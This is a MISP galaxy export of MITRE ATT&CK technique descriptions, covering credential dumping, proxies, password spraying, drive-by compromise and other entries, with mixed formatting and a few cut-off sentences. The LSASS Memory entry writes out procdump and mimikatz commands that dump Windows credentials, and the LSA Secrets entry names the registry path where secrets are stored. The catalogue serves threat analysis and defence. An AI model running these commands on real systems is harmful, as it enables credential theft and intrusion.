- revoked-by: `misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1164"` with estimative-language:likelihood-probability="almost-certain"
Non-Standard Port - T1571

Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088 (Citation: Symantec Elfin Mar 2019) or port 587 (Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.

The tag is: `misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571"`

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SID-History Injection - T1178

The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).

Adversaries may use this mechanism for privilege escalation. With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [Windows Admin Shares](https://attack.mitre.org/techniques/T1077), or [Windows Remote Management](https://attack.mitre.org/techniques/T1028).

The tag is: `misp-galaxy:mitre-attack-pattern="SID-History Injection - T1178"`

SID-History Injection - T1178 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1134.005" with estimative-language:likelihood-probability="almost-certain"
Multi-hop Proxy - T1188

To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.

The tag is: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1188"

Multi-hop Proxy - T1188 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"

Drive-by Compromise - T1189

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).

Multiple ways of delivering exploit code to a browser exist, including:

- A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.
- Malicious ads are paid for and served through legitimate ad providers.
Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).

Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to as a strategic web compromise or watering hole attack. There are several known examples of this occurring. (Citation: Shadowserver Strategic Web Compromise)

Typical drive-by compromise process:

1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.
   - The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, then it will give the adversary code execution on the user’s system unless other protections are in place.
   - In some cases a second visit to the website after the initial scan is required before exploit code is delivered.

Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.

Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites. (Citation: Volexity OceanLotus Nov 2017)

The tag is: `misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189"

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Pre-OS Boot - T1542

Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)

Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.

The tag is: misp-galaxy:mitre-attack-pattern="Pre-OS Boot - T1542"

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Drive-by Compromise - T1456

As described by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), a drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation. For example, a website may contain malicious media content intended to exploit vulnerabilities in media parsers as demonstrated by the Android Stagefright vulnerability (Citation: Zimperium-Stagefright).

(This technique was formerly known as Malicious Web Content. It has been renamed to better align with ATT&CK for Enterprise.)

The tag is: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1456"

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Inter-Process Communication - T1559

Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or
synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern.

Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), may also leverage underlying IPC mechanisms.

The tag is: **misp-galaxy:mitre-attack-pattern="Inter-Process Communication - T1559"**

### Token Impersonation/Theft - T1134.001

Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using `<code>DuplicateToken(Ex)</code>`. The token can then be used with `<code>ImpersonateLoggedOnUser</code>` to allow the calling thread to impersonate a logged on user's security context, or with `<code>SetThreadToken</code>` to assign the impersonated token to a thread.

An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.

The tag is: **misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001"**

### DNS/Passive DNS - T1596.001

Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target's subdomains, mail servers, and other hosts.

Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged
DNS query responses (known as passive DNS). Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: `misp-galaxy:mitre-attack-pattern="DNS/Passive DNS - T1596.001"`

### Junk Data - T1001.001

Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters.

The tag is: `misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001"`

### Traffic Duplication - T1020.001

Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring)

Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001). (Citation: US-CERT-TA18-
Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.

The tag is: `misp-galaxy:mitre-attack-pattern="Traffic Duplication - T1020.001"

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**LSASS Memory - T1003.001**

Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.

For example, on the target host use procdump:

- `<code>procdump -ma lsass.exe lsass_dump</code>`

Locally, mimikatz can be run using:

- `<code>sekurlsa::Minidump lsassdump.dmp</code>`
- `<code>sekurlsa::logonPasswords</code>`

Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user’s Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: `<code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code>` and `<code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>.

An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the...
system boots, or when the AddSecurityPackage Windows API function is called. (Citation: Graeber 2014)

The following SSPs can be used to access credentials:

- **Msv**: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
- **Wdigest**: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection)
- **Kerberos**: Preferred for mutual client-server domain authentication in Windows 2000 and later.
- **CredSSP**: Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: TechNet Blogs Credential Protection)

The tag is: `misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001"`

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<td><a href="https://github.com/mattifestation/PowerSploit">https://github.com/mattifestation/PowerSploit</a></td>
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**Protocol Impersonation - T1001.003**

Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.

Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity.

The tag is: `misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003"`

**Table 3496. Table References**

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<td><a href="https://attack.mitre.org/techniques/T1001/003">https://attack.mitre.org/techniques/T1001/003</a></td>
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</table>
Internal Proxy - T1090.001

Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.

By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.

The tag is: *misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001"*

Table 3497. Table References

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<td><a href="https://attack.mitre.org/techniques/T1090/001">https://attack.mitre.org/techniques/T1090/001</a></td>
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External Proxy - T1090.002

Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.

External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.

The tag is: *misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002"*

Table 3498. Table References

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LSA Secrets - T1003.004

Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at `<code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>`. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)

[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)

The tag is: `misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004"`

Table 3499. Table References

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<td><a href="https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets">https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets</a></td>
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<td><a href="https://github.com/mattifestation/PowerSploit">https://github.com/mattifestation/PowerSploit</a></td>
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Proc Filesystem - T1003.007

Adversaries may gather credentials from information stored in the Proc filesystem or `<code>/proc</code>`. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.

This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.
**File Deletion - T1070.004**

Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.

There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)

**Domain Fronting - T1090.004**

Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).

For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.

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**Table 3500. Table References**

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<td><a href="https://github.com/huntergregal/mimipenguin">https://github.com/huntergregal/mimipenguin</a></td>
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**Table 3502. Table References**
Password Guessing - T1110.001

Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target’s policies on password complexity or use policies that may lock accounts out after a number of failed attempts.

Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization’s login failure policies. (Citation: Cylance Cleaver)

Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:

- SSH (22/TCP)
- Telnet (23/TCP)
- FTP (21/TCP)
- NetBIOS / SMB / Samba (139/TCP & 445/TCP)
- LDAP (389/TCP)
- Kerberos (88/TCP)
- RDP / Terminal Services (3389/TCP)
- HTTP/HTTP Management Services (80/TCP & 443/TCP)
- MSSQL (1433/TCP)
- Oracle (1521/TCP)
- MySQL (3306/TCP)
- VNC (5900/TCP)

In addition to management services, adversaries may “target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,” as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.

The tag is: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001"
Password Cracking - T1110.002

Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network. The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.

The tag is: *misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002"*

Password Spraying - T1110.003

Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)

Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:

- SSH (22/TCP)
- Telnet (23/TCP)
- FTP (21/TCP)
In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365. (Citation: US-CERT TA18-068A 2018)

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.

The tag is: `misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003"`

Table 3505. Table References

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<td><a href="https://www.us-cert.gov/ncas/alerts/TA18-086A">https://www.us-cert.gov/ncas/alerts/TA18-086A</a></td>
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### Credential Stuffing - T1110.004

Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.

Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization’s login failure policies.

Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:
In addition to management services, adversaries may “target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,” as well as externally facing email applications, such as Office 365. (Citation: US-CERT TA18-068A 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Credential Stuffing - T1110.004"

**Web Protocols - T1071.001**

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

The tag is: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001"
Bidirectional Communication - T1102.002

Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002"

Table 3508. Table References

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Malicious Link - T1204.001

An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).

The tag is: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001"

Table 3509. Table References

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Port Knocking - T1205.001

Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.

This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.

The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.

The tag is: misp-galaxy:mitre-attack-pattern="Port Knocking - T1205.001"

Table 3510. Table References

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Binary Padding - T1027.001

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.

Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)

The tag is: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001"

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</table>
Mail Protocols - T1071.003

Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

The tag is: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003"

Environmental Keying - T1480.001

Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)

Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).

Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries
may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.

Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.

The tag is: \textit{misp-galaxy:mitre-attack-pattern="Environmental Keying - T1480.001"}

\textit{Table 3513. Table References}

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\textbf{Domain Properties - T1590.001}

Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for
Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: *misp-galaxy:mitre-attack-pattern="Domain Properties - T1590.001"*

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**Web Cookies - T1606.001**

Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.

Adversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.

Once forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)

The tag is: *misp-galaxy:mitre-attack-pattern="Web Cookies - T1606.001"*

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Upload Malware - T1608.001

Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.

Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin. (Citation: Volexity Ocean Lotus November 2020)

Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.

The tag is: `misp-galaxy:mitre-attack-pattern="Upload Malware - T1608.001"`

**Table 3516. Table References**

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Local Groups - T1069.001

Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

Commands such as `<code>net localgroup</code>` of the [Net](https://attack.mitre.org/software/S0039) utility, `<code>dscl . -list /Groups</code>` on macOS, and `<code>groups</code>` on Linux can list local groups.

The tag is: `misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001"`
Default Accounts - T1078.001

Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)

Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)

The tag is: misp-galaxy:mitre-attack-pattern="Default Accounts - T1078.001"

Local Account - T1087.001

Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

